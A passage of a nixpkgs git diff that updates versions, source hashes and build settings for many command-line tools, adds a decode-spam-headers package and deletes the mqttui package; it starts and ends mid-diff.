= "sha256-+B/k3MqoefD3AVSYuR006eYyNe+njsfiqwBtQ+1YIHA="; + sha256 = "sha256-h2MJqbouPSciOdChLNIskYm3YLpJYK9gjTDB8StmBqg="; }; nativeBuildInputs = [ makeWrapper ]; diff --git a/nixpkgs/pkgs/tools/misc/past-time/default.nix b/nixpkgs/pkgs/tools/misc/past-time/default.nix index cb36808ea366..4bdcff8c1935 100644 --- a/nixpkgs/pkgs/tools/misc/past-time/default.nix +++ b/nixpkgs/pkgs/tools/misc/past-time/default.nix @@ -5,16 +5,20 @@ python3.pkgs.buildPythonApplication rec { pname = "past-time"; - version = "0.2.1"; - format = "setuptools"; + version = "0.3.1"; + pyproject = true; src = fetchFromGitHub { owner = "fabaff"; - repo = pname; + repo = "past-time"; rev = "refs/tags/${version}"; - hash = "sha256-9LmFOWNUkvKfWHLo4HB1W1UBQL90Gp9UJJ3VDIYBDHo="; + hash = "sha256-NSuU33vuHbgJ+cG0FrGYLizIrG7jSz+veptt3D4UegY="; }; + nativeBuildInputs = with python3.pkgs; [ + poetry-core + ]; + propagatedBuildInputs = with python3.pkgs; [ click tqdm diff --git a/nixpkgs/pkgs/tools/misc/pipectl/default.nix b/nixpkgs/pkgs/tools/misc/pipectl/default.nix index f3e80655279f..f5cdeffc3ece 100644 --- a/nixpkgs/pkgs/tools/misc/pipectl/default.nix +++ b/nixpkgs/pkgs/tools/misc/pipectl/default.nix @@ -7,13 +7,13 @@ stdenv.mkDerivation rec { pname = "pipectl"; - version = "0.4.1"; + version = "0.4.2"; src = fetchFromGitHub { owner = "Ferdi265"; repo = pname; rev = "v${version}"; - hash = "sha256-dWRem9VHzMwVo+ahUagZB2r4Ag8PyBef5X41vVpZcAc="; + hash = "sha256-Ixch5iyeIjx+hSvln8L0N8pXG7ordpsFVroqZPUzAG0="; }; nativeBuildInputs = [ cmake scdoc ]; diff --git a/nixpkgs/pkgs/tools/misc/pre-commit/default.nix b/nixpkgs/pkgs/tools/misc/pre-commit/default.nix index c52c453dd8be..04b485427547 100644 --- a/nixpkgs/pkgs/tools/misc/pre-commit/default.nix +++ b/nixpkgs/pkgs/tools/misc/pre-commit/default.nix @@ -18,7 +18,7 @@ with python3Packages; buildPythonApplication rec { pname = "pre-commit"; - version = "3.6.1"; + version = "3.6.2"; format = "setuptools"; disabled = pythonOlder "3.9"; @@ -27,7 +27,7 @@ buildPythonApplication rec { owner = "pre-commit"; repo = "pre-commit"; rev = "refs/tags/v${version}"; - hash = "sha256-UmQ1GehoMDXKEXo8wgPLxTDbtObk7YC2cfk1yNqesJM="; + hash = "sha256-rlGkoaVLrTCEPgPFNUWefJf6MJaKTA2RDSbV7eGtaAU="; }; patches = [ @@ -134,6 +134,7 @@ buildPythonApplication rec { "test_docker_hook" "test_docker_image_hook_via_args" "test_docker_image_hook_via_entrypoint" + "test_during_commit_all" "test_golang_default_version" "test_golang_hook" "test_golang_hook_still_works_when_gobin_is_set" diff --git a/nixpkgs/pkgs/tools/misc/remind/default.nix b/nixpkgs/pkgs/tools/misc/remind/default.nix index bd049671336e..b9becd60ab08 100644 --- a/nixpkgs/pkgs/tools/misc/remind/default.nix +++ b/nixpkgs/pkgs/tools/misc/remind/default.nix @@ -15,11 +15,11 @@ let in tcl.mkTclDerivation rec { pname = "remind"; - version = "04.02.09"; + version = "04.03.02"; src = fetchurl { url = "https://dianne.skoll.ca/projects/remind/download/remind-${version}.tar.gz"; - sha256 = "sha256-ZEaEYLQFpwXfp7ONsUt4I/ENqPADruooFRfdtJhrhyo="; + sha256 = "sha256-tL5Ntb/RIoT9mKcdU1ndBo/pGwhtIsRnTV0lL6Sg1Vw="; }; propagatedBuildInputs = tclLibraries; diff --git a/nixpkgs/pkgs/tools/misc/steampipe/default.nix b/nixpkgs/pkgs/tools/misc/steampipe/default.nix index ecfa780cc532..31d27ffe8bae 100644 --- a/nixpkgs/pkgs/tools/misc/steampipe/default.nix +++ b/nixpkgs/pkgs/tools/misc/steampipe/default.nix @@ -2,13 +2,13 @@ buildGoModule rec { pname = "steampipe"; - version = "0.21.7"; + version = "0.21.8"; src = fetchFromGitHub { owner = "turbot"; repo = "steampipe"; rev = "v${version}"; - hash = "sha256-puaqAMUnlQNOQmxhJCKQKTBypTjdModijtIpPBZsIXY="; + hash = "sha256-PY2CpieY1kTuT3Yd6i5hiRjVEwYNHn1GF+E0g6u8BP0="; }; vendorHash = "sha256-yS2FiTnK65LAY3tGSlMy0LMg6691tS/9yQ4w7HrW/pw="; diff --git a/nixpkgs/pkgs/tools/misc/time-decode/default.nix b/nixpkgs/pkgs/tools/misc/time-decode/default.nix index edd0eba43a24..b208fd3e2ba2 100644 --- a/nixpkgs/pkgs/tools/misc/time-decode/default.nix +++ b/nixpkgs/pkgs/tools/misc/time-decode/default.nix @@ -5,19 +5,24 @@ python3.pkgs.buildPythonApplication rec { pname = "time-decode"; - version = "6.1.0"; - format = "setuptools"; + version = "7.0.2"; + pyproject = true; src = fetchFromGitHub { owner = "digitalsleuth"; repo = "time_decode"; rev = "refs/tags/v${version}"; - hash = "sha256-LbXycu3Yiku9ToW+WS/yUqwicvckj2IkP09TiZkRXnk="; + hash = "sha256-K60xIQ6TWPYlsR6YjIquey5Ioaw4oAId59CPlQNK4yk="; }; + nativeBuildInputs = with python3.pkgs; [ + setuptools + ]; + propagatedBuildInputs = with python3.pkgs; [ colorama python-dateutil + pyqt6 ]; # Project has no tests diff --git a/nixpkgs/pkgs/tools/misc/tkman/default.nix b/nixpkgs/pkgs/tools/misc/tkman/default.nix index e178e173108a..4df680fb6b8c 100644 --- a/nixpkgs/pkgs/tools/misc/tkman/default.nix +++ b/nixpkgs/pkgs/tools/misc/tkman/default.nix @@ -10,12 +10,12 @@ , rman }: -stdenv.mkDerivation rec { +stdenv.mkDerivation (finalAttrs: { pname = "tkman"; version = "2.2"; src = fetchzip { - url = "mirror://sourceforge/tkman/tkman-${version}.tar.gz"; + url = "mirror://sourceforge/tkman/tkman-${finalAttrs.version}.tar.gz"; hash = "sha256-S4ffz+7zmVy9+isz/8q+FV4wF5Rw2iL1ftY8RsJjRLs="; }; @@ -84,4 +84,4 @@ stdenv.mkDerivation rec { platforms = platforms.unix; maintainers = with maintainers; [ fgaz ]; }; -} +}) diff --git a/nixpkgs/pkgs/tools/misc/tty-clock/default.nix b/nixpkgs/pkgs/tools/misc/tty-clock/default.nix index 32701caa64de..0abb0c668be0 100644 --- a/nixpkgs/pkgs/tools/misc/tty-clock/default.nix +++ b/nixpkgs/pkgs/tools/misc/tty-clock/default.nix @@ -30,7 +30,7 @@ stdenv.mkDerivation rec { meta = with lib; { broken = stdenv.isDarwin; homepage = "https://github.com/xorg62/tty-clock"; - license = licenses.free; + license = licenses.bsd3; description = "Digital clock in ncurses"; platforms = platforms.all; maintainers = [ maintainers.koral ]; diff --git a/nixpkgs/pkgs/tools/misc/urn-timer/default.nix b/nixpkgs/pkgs/tools/misc/urn-timer/default.nix index 26b59a7f908a..df45524a8a06 100644 --- a/nixpkgs/pkgs/tools/misc/urn-timer/default.nix +++ b/nixpkgs/pkgs/tools/misc/urn-timer/default.nix @@ -12,13 +12,13 @@ stdenv.mkDerivation { pname = "urn-timer"; - version = "unstable-2023-08-07"; + version = "unstable-2024-03-05"; src = fetchFromGitHub { owner = "paoloose"; repo = "urn"; - rev = "3468e297ee67aa83e6c26529acd35142ade5c6ff"; - hash = "sha256-e9u/bjFjwgF5QciiqB3AWhyYj7eCstzkpSR9+xNA+4I="; + rev = "10082428749fabb69db1556f19940d8700ce48a2"; + hash = "sha256-sQjHQ/i1d4v4ZnM0YAay+MdIj5l/FfIYj+NdH48OqfU="; }; nativeBuildInputs = [ diff --git a/nixpkgs/pkgs/tools/misc/vtm/default.nix b/nixpkgs/pkgs/tools/misc/vtm/default.nix index 3e37ae1bddab..05218731add1 100644 --- a/nixpkgs/pkgs/tools/misc/vtm/default.nix +++ b/nixpkgs/pkgs/tools/misc/vtm/default.nix @@ -6,13 +6,13 @@ stdenv.mkDerivation (finalAttrs: { pname = "vtm"; - version = "0.9.63"; + version = "0.9.74"; src = fetchFromGitHub { owner = "netxs-group"; repo = "vtm"; rev = "v${finalAttrs.version}"; - hash = "sha256-6WRSkS2uPHOcEmk2xB63G+zxbRu1tlz1D7k92ITEgSQ="; + hash = "sha256-O8fnh8I3KbiOD40bU0eO7tbvpMoSCVonKPVFx5pynR4="; }; nativeBuildInputs = [ diff --git a/nixpkgs/pkgs/tools/misc/vttest/default.nix b/nixpkgs/pkgs/tools/misc/vttest/default.nix index 962322ba3437..4808d4dacdbf 100644 --- a/nixpkgs/pkgs/tools/misc/vttest/default.nix +++ b/nixpkgs/pkgs/tools/misc/vttest/default.nix @@ -2,14 +2,14 @@ stdenv.mkDerivation rec { pname = "vttest"; - version = "20231230"; + version = "20240218"; src = fetchurl { urls = [ "https://invisible-mirror.net/archives/${pname}/${pname}-${version}.tgz" "ftp://ftp.invisible-island.net/${pname}/${pname}-${version}.tgz" ]; - sha256 = "sha256-SuYjx3t5fn+UlGlI0LJ+RqtOAdhD9iYIAMVzkKoEy/U="; + sha256 = "sha256-YlspL4BS/7vv59nW+9+cjR/Bi1yFVo8lRwl9l8VAvXU="; }; meta = with lib; { diff --git a/nixpkgs/pkgs/tools/misc/wasm-tools/default.nix b/nixpkgs/pkgs/tools/misc/wasm-tools/default.nix index d72e726da863..539850306bfe 100644 --- a/nixpkgs/pkgs/tools/misc/wasm-tools/default.nix +++ b/nixpkgs/pkgs/tools/misc/wasm-tools/default.nix @@ -5,19 +5,19 @@ rustPlatform.buildRustPackage rec { pname = "wasm-tools"; - version = "1.200.0"; + version = "1.201.0"; src = fetchFromGitHub { owner = "bytecodealliance"; repo = pname; rev = "v${version}"; - hash = "sha256-GuN70HiCmqBRwcosXqzT8sl5SRCTttOPIRl6pxaQiec="; + hash = "sha256-L3wo6a9rxqZ8Rjz8nejbfdTgQclFFp2ShdP6QECbrmg="; fetchSubmodules = true; }; # Disable cargo-auditable until https://github.com/rust-secure-code/cargo-auditable/issues/124 is solved. auditable = false; - cargoHash = "sha256-T9p1PvgiAZrj82ABx7KX2InZACQ/ff7N0zPKGTCTBPk="; + cargoHash = "sha256-XzU43bcoRGHhVmpkcKvdRH9UybjTkQWH8RKBqsM/31M="; cargoBuildFlags = [ "--package" "wasm-tools" ]; cargoTestFlags = [ "--all" ]; diff --git a/nixpkgs/pkgs/tools/misc/wlc/default.nix b/nixpkgs/pkgs/tools/misc/wlc/default.nix index 3b52d7eb284d..648f05587d07 100644 --- a/nixpkgs/pkgs/tools/misc/wlc/default.nix +++ b/nixpkgs/pkgs/tools/misc/wlc/default.nix @@ -7,11 +7,11 @@ with python3.pkgs; buildPythonPackage rec { pname = "wlc"; - version = "1.13"; + version = "1.14"; src = fetchPypi { inherit pname version; - sha256 = "sha256-MZ6avuMNT5HIIXW7ezukAJeO70o+SrgJnBnGjNy4tYE="; + sha256 = "sha256-QMF41B6a2jMSdhjeFoRQq+K1YJAEz96msHLzX6wVqSc="; }; propagatedBuildInputs = [ diff --git a/nixpkgs/pkgs/tools/misc/wootility/default.nix b/nixpkgs/pkgs/tools/misc/wootility/default.nix index a4f3cb2f92d8..eaa910def691 100644 --- a/nixpkgs/pkgs/tools/misc/wootility/default.nix +++ b/nixpkgs/pkgs/tools/misc/wootility/default.nix @@ -8,11 +8,11 @@ appimageTools.wrapType2 rec { pname = "wootility"; - version = "4.5.0"; + version = "4.6.15"; src = fetchurl { url = "https://s3.eu-west-2.amazonaws.com/wooting-update/wootility-lekker-linux-latest/wootility-lekker-${version}.AppImage"; - sha256 = "sha256-5V1OpQZk234iKXOlpoXCbWPyixXkrWT8KkrGB92lPro="; + sha256 = "sha256-A/cjm9rhcgp68hbyjy7OfYPBKBcccl0OdD7MTdpEdPM="; }; profile = '' diff --git a/nixpkgs/pkgs/tools/misc/xcp/default.nix b/nixpkgs/pkgs/tools/misc/xcp/default.nix index b1c11c4465e9..bb310c3cce7c 100644 --- a/nixpkgs/pkgs/tools/misc/xcp/default.nix +++ b/nixpkgs/pkgs/tools/misc/xcp/default.nix @@ -2,19 +2,19 @@ rustPlatform.buildRustPackage rec { pname = "xcp"; - version = "0.18.1"; + version = "0.20.4"; src = fetchFromGitHub { owner = "tarka"; repo = pname; rev = "v${version}"; - sha256 = "sha256-uZnKrWD3a3TpdKplLxzCKacfpuoo3vrCZmFsePIxR18="; + hash = "sha256-0ucm8XBxYwXvpVJN8If8BIToQGiBisKLZJYKuvaORto="; }; # no such file or directory errors doCheck = false; - cargoHash = "sha256-QaLNc05fI6V/5hbSfOL+uKnjkyxDclAmULx45z9gigs="; + cargoHash = "sha256-UdQUrIRos3TmebotdESvKH+90WVMJ0oTc43p+AT4xMI="; meta = with lib; { description = "An extended cp(1)"; diff --git a/nixpkgs/pkgs/tools/misc/xq/default.nix b/nixpkgs/pkgs/tools/misc/xq/default.nix index 987e5f1efc74..67d09807afc9 100644 --- a/nixpkgs/pkgs/tools/misc/xq/default.nix +++ b/nixpkgs/pkgs/tools/misc/xq/default.nix @@ -5,14 +5,14 @@ rustPlatform.buildRustPackage rec { pname = "xq"; - version = "0.3.1"; + version = "0.4.0"; src = fetchCrate { inherit pname version; - sha256 = "sha256-KR5gjRJH392s7Ue0F26slj4sRosFAAAahf6up+yOQno="; + sha256 = "sha256-pQhzyXLurFnBn9DkkXA54NsAX8wE4rQvaHXZLkLDwdw="; }; - cargoHash = "sha256-eL7VFLRfRVF2seWgHLWGudsTt5u+JcnNrJiD7K47EPA="; + cargoHash = "sha256-gfCH/jnJTUiqwzxUYuZuFWh9Wq8hp43z2gRdaDQ908g="; meta = with lib; { description = "Pure rust implementation of jq"; diff --git a/nixpkgs/pkgs/tools/misc/ytfzf/default.nix b/nixpkgs/pkgs/tools/misc/ytfzf/default.nix index 905c7776f1c2..783ac793604f 100644 --- a/nixpkgs/pkgs/tools/misc/ytfzf/default.nix +++ b/nixpkgs/pkgs/tools/misc/ytfzf/default.nix @@ -15,13 +15,13 @@ stdenv.mkDerivation rec { pname = "ytfzf"; - version = "2.6.1"; + version = "2.6.2"; src = fetchFromGitHub { owner = "pystardust"; repo = "ytfzf"; rev = "v${version}"; - hash = "sha256-wd7IgJRSh8UJ28slItIz1OhAg7cgVSDUldCyaObn6Ak="; + hash = "sha256-rwCVOdu9UfTArISt8ITQtLU4Gj2EZd07bcFKvxXQ7Bc="; }; nativeBuildInputs = [ makeWrapper ]; diff --git a/nixpkgs/pkgs/tools/networking/acme-client/default.nix b/nixpkgs/pkgs/tools/networking/acme-client/default.nix index 2a0baedde7ca..983a2b1a1778 100644 --- a/nixpkgs/pkgs/tools/networking/acme-client/default.nix +++ b/nixpkgs/pkgs/tools/networking/acme-client/default.nix @@ -8,11 +8,11 @@ stdenv.mkDerivation rec { pname = "acme-client"; - version = "1.3.2"; + version = "1.3.3"; src = fetchurl { url = "https://data.wolfsden.cz/sources/acme-client-${version}.tar.gz"; - hash = "sha256-nVB0VIT6mwKwSTY+wDcuxMtpEjtZ9Z0ke0lJ7SzdsJ0="; + hash = "sha256-HJOk2vlDD7ADrLdf/eLEp+teu9XN0KrghEe6y4FIDoI="; }; nativeBuildInputs = [ @@ -30,7 +30,7 @@ stdenv.mkDerivation rec { meta = with lib; { description = "Secure ACME/Let's Encrypt client"; - homepage = "https://sr.ht/~graywolf/acme-client-portable/"; + homepage = "https://git.wolfsden.cz/acme-client-portable"; platforms = platforms.unix; license = licenses.isc; maintainers = with maintainers; [ pmahoney ]; diff --git a/nixpkgs/pkgs/tools/networking/ain/default.nix b/nixpkgs/pkgs/tools/networking/ain/default.nix index 878af2c68211..755777f3939c 100644 --- a/nixpkgs/pkgs/tools/networking/ain/default.nix +++ b/nixpkgs/pkgs/tools/networking/ain/default.nix @@ -5,13 +5,13 @@ buildGoModule rec { pname = "ain"; - version = "1.3.0"; + version = "1.4.0"; src = fetchFromGitHub { owner = "jonaslu"; repo = "ain"; rev = "v${version}"; - hash = "sha256-QBtnVtTGONbYToGhZ0L4CZ3o2hViEN1l94ZKJHVMd1w="; + hash = "sha256-LjGiRLTQxJ83fFBYH7RzQjDG8ZzHT/y1I7nXTb4peAo="; }; vendorHash = "sha256-eyB+0D0+4hHG4yKDj/m9QB+8YTyv+por8fTyu/WcZyg="; diff --git a/nixpkgs/pkgs/tools/networking/boundary/default.nix b/nixpkgs/pkgs/tools/networking/boundary/default.nix index 66973b17ccba..4480bdbede1f 100644 --- a/nixpkgs/pkgs/tools/networking/boundary/default.nix +++ b/nixpkgs/pkgs/tools/networking/boundary/default.nix @@ -2,7 +2,7 @@ stdenv.mkDerivation rec { pname = "boundary"; - version = "0.15.0"; + version = "0.15.1"; src = let @@ -15,10 +15,10 @@ stdenv.mkDerivation rec { aarch64-darwin = "darwin_arm64"; }; sha256 = selectSystem { - x86_64-linux = "sha256-9swvTXPlGXXkHPWzjg54rpH8bsscJ393S2OKRImZGzs="; - aarch64-linux = "sha256-dCmJmL+6l+QxWgZLCbj3ymzarwvJTqkyseQj9dO7DcM="; - x86_64-darwin = "sha256-vZudiEt+Bi0GuW/jVgIniNq2obAkL/mH0EoUS2cwj0U="; - aarch64-darwin = "sha256-dL9SfzN/DZZggpX3x67rIhOJupkOWxcFGdQDMPffecY="; + x86_64-linux = "sha256-LPIvbT934HjetzaljMMVaZslavAY2torE684MLOTvLo="; + aarch64-linux = "sha256-RH8BHo97nTfMSWLfVY6r7qWqMBXcZRCIY5u/9lzrog4="; + x86_64-darwin = "sha256-6jEVffu4bTKzlnT364q5oD8+T6nXyqKZhBVLXv0Pbac="; + aarch64-darwin = "sha256-m+rGK7VbCZNDsumrFI3HNa/CG1eEzKDQTNTbb2ECn7c="; }; in fetchzip { diff --git a/nixpkgs/pkgs/tools/networking/brook/default.nix b/nixpkgs/pkgs/tools/networking/brook/default.nix index 432b49523e18..77a70381b1d9 100644 --- a/nixpkgs/pkgs/tools/networking/brook/default.nix +++ b/nixpkgs/pkgs/tools/networking/brook/default.nix @@ -2,16 +2,16 @@ buildGoModule rec { pname = "brook"; - version = "20240214"; + version = "20240404"; src = fetchFromGitHub { owner = "txthinking"; repo = pname; rev = "v${version}"; - sha256 = "sha256-5+AqlmDa11PrB24XkelOFHK4sBi4j78WMLQrzDuP1/M="; + sha256 = "sha256-QqA0LnbC72bnAQ25AehTnoXgdqQPc8wztHcFd4Q19ko="; }; - vendorHash = "sha256-cTw9k4AqS4NOJ0vX0InR0xxOfCXIgA3FxgL6oXryOnA="; + vendorHash = "sha256-1aaOPeKHPrZO6WK08EhX4+dME0A33raQnbZi/aNFpIw="; meta = with lib; { homepage = "https://github.com/txthinking/brook"; diff --git a/nixpkgs/pkgs/tools/networking/cfspeedtest/default.nix b/nixpkgs/pkgs/tools/networking/cfspeedtest/default.nix index f6b3c59d5864..fcde1b580378 100644 --- a/nixpkgs/pkgs/tools/networking/cfspeedtest/default.nix +++ b/nixpkgs/pkgs/tools/networking/cfspeedtest/default.nix @@ -6,16 +6,16 @@ rustPlatform.buildRustPackage rec { pname = "cfspeedtest"; - version = "1.2.1"; + version = "1.2.2"; src = fetchFromGitHub { owner = "code-inflation"; repo = pname; rev = "refs/tags/v${version}"; - hash = "sha256-sGBEVmiVa9jWlirtmP+lhXNVN2X9Pv/oS9KhiuaOMl8="; + hash = "sha256-0BX9nEhSyYY/fDJHZOw0URLPIXZGRGZyXB1Tm8GX1/A="; }; - cargoHash = "sha256-/Ajlo6nr36GF5jyyuKdQe5HajETMsuEWbXxaszrcj0Y="; + cargoHash = "sha256-GNoYLps6OaA3Ubb0nG6hQfe6r52lhnIb19n1PLCsbXs="; meta = with lib; { description = "Unofficial CLI for speed.cloudflare.com"; diff --git a/nixpkgs/pkgs/tools/networking/decode-spam-headers/default.nix b/nixpkgs/pkgs/tools/networking/decode-spam-headers/default.nix new file mode 100644 index 000000000000..8f18658b52c5 --- /dev/null +++ b/nixpkgs/pkgs/tools/networking/decode-spam-headers/default.nix @@ -0,0 +1,58 @@ +{ lib, stdenv, fetchFromGitHub, python3Packages }: + +python3Packages.buildPythonApplication rec { + pname = "decode-spam-headers"; + version = "2022-09-22-unreleased"; + + src = fetchFromGitHub { + owner = "mgeeky"; + repo = "decode-spam-headers"; + rev = "492b6e744475cd5d3dd68a8140bc3478244b7df1"; + sha256 = "sha256-gBDkvlZCndQjochn6TZtM/Lanza64LqMjNnLjn+pPR4="; + }; + + format = "other"; + + outputs = [ "out" "doc" ]; + + installPhase = '' + install -D decode-spam-headers.py $out/bin/decode-spam-headers + + mkdir -p $doc/share/doc/${pname} + mv \ + README.md \ + img/ \ + $doc/share/doc/${pname} + ''; + + propagatedBuildInputs = [ + python3Packages.python-dateutil + python3Packages.tldextract + python3Packages.packaging + python3Packages.dnspython + python3Packages.requests + python3Packages.colorama + ]; + + meta = with lib; { + homepage = "https://github.com/mgeeky/decode-spam-headers/"; + description = "A script that helps you understand why your E-Mail ended up in Spam"; + longDescription = '' + Whether you are trying to understand why a specific e-mail ended up in + SPAM/Junk for your daily Administrative duties or for your Red-Team + Phishing simulation purposes, this script is there for you to help! + + This tool accepts on input an *.EML or *.txt file with all the SMTP + headers. It will then extract a subset of interesting headers and using + 105+ tests will attempt to decode them as much as possible. + + This script also extracts all IPv4 addresses and domain names and performs + full DNS resolution of them. + + Resulting output will contain useful information on why this e-mail might + have been blocked. + ''; + license = licenses.mit; + maintainers = with maintainers; [ ]; + }; +} diff --git a/nixpkgs/pkgs/tools/networking/dnsproxy/default.nix b/nixpkgs/pkgs/tools/networking/dnsproxy/default.nix index 7ebc14fc81e3..15bf69ad6efe 100644 --- a/nixpkgs/pkgs/tools/networking/dnsproxy/default.nix +++ b/nixpkgs/pkgs/tools/networking/dnsproxy/default.nix @@ -2,18 +2,21 @@ buildGoModule rec { pname = "dnsproxy"; - version = "0.54.0"; + version = "0.65.2"; src = fetchFromGitHub { owner = "AdguardTeam"; - repo = pname; + repo = "dnsproxy"; rev = "v${version}"; - sha256 = "sha256-wA88v8zF5sq3NQwKh8g4k/COviuaegGn6bBTzBMcdGM="; + hash = "sha256-+82dYFk5mN1p17++2Yg3GCLe8Ud4KbZIGgdfaTepEBw="; }; - vendorHash = null; + vendorHash = "sha256-kBf32hXZ5fpu2ME30t5FmYwGMnD6Jp6owGnjUL9CViY="; - ldflags = [ "-s" "-w" "-X" "main.VersionString=${version}" ]; + ldflags = [ "-s" "-w" "-X" "github.com/AdguardTeam/dnsproxy/internal/version.version=${version}" ]; + + # Development tool dependencies; not part of the main project + excludedPackages = [ "internal/tools" ]; doCheck = false; @@ -21,7 +24,7 @@ buildGoModule rec { description = "Simple DNS proxy with DoH, DoT, and DNSCrypt support"; homepage = "https://github.com/AdguardTeam/dnsproxy"; license = licenses.asl20; - maintainers = with maintainers; [ contrun ]; + maintainers = with maintainers; [ contrun diogotcorreia ]; mainProgram = "dnsproxy"; }; } diff --git a/nixpkgs/pkgs/tools/networking/frp/default.nix b/nixpkgs/pkgs/tools/networking/frp/default.nix index 3f81a7283170..38401ce3acf9 100644 --- a/nixpkgs/pkgs/tools/networking/frp/default.nix +++ b/nixpkgs/pkgs/tools/networking/frp/default.nix @@ -2,16 +2,16 @@ buildGoModule rec { pname = "frp"; - version = "0.53.2"; + version = "0.54.0"; src = fetchFromGitHub { owner = "fatedier"; repo = pname; rev = "v${version}"; - sha256 = "sha256-/z/pZgB4PepJXXjOBuuq1wHXI2pn/KCxY9cdfANdWGQ="; + hash = "sha256-K/Yyu8J1PT+rs/lLxhOXxMQ4winZF1zfD2BOBepzXeM="; }; - vendorHash = "sha256-mcgHbwdqcIu4BceuQg+Es0dsIpWG0bsIpd056IOxuiY="; + vendorHash = "sha256-jj0ViYBFxexgoBPzjDC/9i7lH0/ZdEH2u8offndIKSw="; doCheck = false; diff --git a/nixpkgs/pkgs/tools/networking/globalping-cli/default.nix b/nixpkgs/pkgs/tools/networking/globalping-cli/default.nix index 8c77a942d663..9b158128fe88 100644 --- a/nixpkgs/pkgs/tools/networking/globalping-cli/default.nix +++ b/nixpkgs/pkgs/tools/networking/globalping-cli/default.nix @@ -2,16 +2,16 @@ buildGoModule rec { pname = "globalping-cli"; - version = "1.1.6"; + version = "1.2.1"; src = fetchFromGitHub { owner = "jsdelivr"; repo = pname; rev = "v${version}"; - hash = "sha256-bPHS980iByWEBiqs4CEoI8SdlI4vaqGhyIRrXUUtVOo="; + hash = "sha256-9FMp3cGJr8RdySZvSflYa91uaIV5wVl6WmUDvbRkSFY="; }; - vendorHash = "sha256-PiSFDA6mZNDe6BhmKxAGuXsBZ+3aBFJ/gBwY/a6Z5gE="; + vendorHash = "sha256-3VqCgkyhPKk5iBkKOK2EajEKgEnCHOQjO59AKFafQHc="; nativeBuildInputs = [ installShellFiles ]; diff --git a/nixpkgs/pkgs/tools/networking/gobgp/default.nix b/nixpkgs/pkgs/tools/networking/gobgp/default.nix index ab2ae59950cb..ed04e7f57b0a 100644 --- a/nixpkgs/pkgs/tools/networking/gobgp/default.nix +++ b/nixpkgs/pkgs/tools/networking/gobgp/default.nix @@ -2,13 +2,13 @@ buildGoModule rec { pname = "gobgp"; - version = "3.23.0"; + version = "3.24.0"; src = fetchFromGitHub { owner = "osrg"; repo = "gobgp"; rev = "v${version}"; - sha256 = "sha256-PUwYcwWgaV/DQl565fugppc+I/y7z7Ns3P4SspS88ts="; + sha256 = "sha256-JGgkhNSKprqaUBaW+m/5vYnuDri1Ibyf2Y6SMlscnIU="; }; vendorHash = "sha256-5eB3vFOo3LCsjMnWYFH0yq5+IunwKXp5C34x6NvpFZ8="; diff --git a/nixpkgs/pkgs/tools/networking/goimapnotify/default.nix b/nixpkgs/pkgs/tools/networking/goimapnotify/default.nix index 34de361d46b8..fc339f219349 100644 --- a/nixpkgs/pkgs/tools/networking/goimapnotify/default.nix +++ b/nixpkgs/pkgs/tools/networking/goimapnotify/default.nix @@ -2,13 +2,13 @@ buildGoModule rec { pname = "goimapnotify"; - version = "2.3.11"; + version = "2.3.12"; src = fetchFromGitLab { owner = "shackra"; repo = "goimapnotify"; rev = version; - sha256 = "sha256-b3w+SqmxRY/24qgFUSM4RQswObAH5jy3yEfGXY298Ko="; + sha256 = "sha256-H1psA73ZBz4ZCFWGpiAXQ3bDLVH3jPnyOvPtUdsO6BA="; }; vendorHash = "sha256-DphGe9jbKo1aIfpF5kRYNSn/uIYHaRMrygda5t46svw="; diff --git a/nixpkgs/pkgs/tools/networking/httplab/default.nix b/nixpkgs/pkgs/tools/networking/httplab/default.nix index 6e1be43ac5f5..c78f32d05650 100644 --- a/nixpkgs/pkgs/tools/networking/httplab/default.nix +++ b/nixpkgs/pkgs/tools/networking/httplab/default.nix @@ -1,25 +1,17 @@ -{ lib, buildGoModule, fetchFromGitHub, fetchpatch }: +{ lib, buildGoModule, fetchFromGitHub }: buildGoModule rec { pname = "httplab"; - version = "0.4.0"; + version = "0.4.2"; src = fetchFromGitHub { owner = "qustavo"; repo = "httplab"; rev = "v${version}"; - hash = "sha256-+qcECfQo9Wa4JQ09ujhKjQndmcFn03hTfII636+1ghA="; + hash = "sha256-UL1i8JpgofXUB+jtW2EtSR1pM/Fdqnbg2EXPJAjc0H0="; }; - vendorHash = null; - - patches = [ - # Add Go Modules support - (fetchpatch { - url = "https://github.com/qustavo/httplab/commit/80680bebc83f1ed19216f60339c62cd9213d736b.patch"; - hash = "sha256-y4KO3FGwKNAfM+4uR3KDbV90d/4JeBGvWtfirDJrWZk="; - }) - ]; + vendorHash = "sha256-vL3a9eO5G0WqnqcIjA9D2XM7iQ87JH0q+an2nLcG28A="; ldflags = [ "-s" "-w" ]; diff --git a/nixpkgs/pkgs/tools/networking/minio-client/default.nix b/nixpkgs/pkgs/tools/networking/minio-client/default.nix index f05814f00f0f..804181d35bf5 100644 --- a/nixpkgs/pkgs/tools/networking/minio-client/default.nix +++ b/nixpkgs/pkgs/tools/networking/minio-client/default.nix @@ -2,16 +2,16 @@ buildGoModule rec { pname = "minio-client"; - version = "2024-02-16T11-05-48Z"; + version = "2024-03-07T00-31-49Z"; src = fetchFromGitHub { owner = "minio"; repo = "mc"; rev = "RELEASE.${version}"; - sha256 = "sha256-Kqv48krXiDi/8QtCEpn0uGvuLS2P6BYAtSnY5sNrCQ0="; + sha256 = "sha256-vrK3CjZWJp8Qs1GiTs3rcOYyrkBDVGspSLL63u9r/8Q="; }; - vendorHash = "sha256-wxFhj+oqj5WV/UkPZlmeJHF2WC4oLlZOql1qgSFs+zU="; + vendorHash = "sha256-T0NOik/KQ2j666BeHPuEyU2ngne2K+NIF8AVAoMXsaM="; subPackages = [ "." ]; diff --git a/nixpkgs/pkgs/tools/networking/mqttui/default.nix b/nixpkgs/pkgs/tools/networking/mqttui/default.nix deleted file mode 100644 index e457fa7479b1..000000000000 --- a/nixpkgs/pkgs/tools/networking/mqttui/default.nix +++ /dev/null @@ -1,31 +0,0 @@ -{ lib -, stdenv -, fetchFromGitHub -, rustPlatform -, Security -}: - -rustPlatform.buildRustPackage rec { - pname = "mqttui"; - version = "0.19.0"; - - src = fetchFromGitHub { - owner = "EdJoPaTo"; - repo = pname; - rev = "refs/tags/v${version}"; - hash = "sha256-cezG9hdHOeTExX4OJwJ22e/PvfdySPzQGwxumavV++Q="; - }; - - cargoHash = "sha256-vSlziZtjyzsd346qUBEPEl8I3UlPhWHRu4+FiD1XqOo="; - - buildInputs = lib.optional stdenv.isDarwin Security; - - meta = with lib; { - description = "Terminal client for MQTT"; - homepage = "https://github.com/EdJoPaTo/mqttui"; - changelog = "https://github.com/EdJoPaTo/mqttui/blob/v${version}/CHANGELOG.md"; - license = licenses.gpl3Only; - maintainers = with maintainers; [ fab ]; - 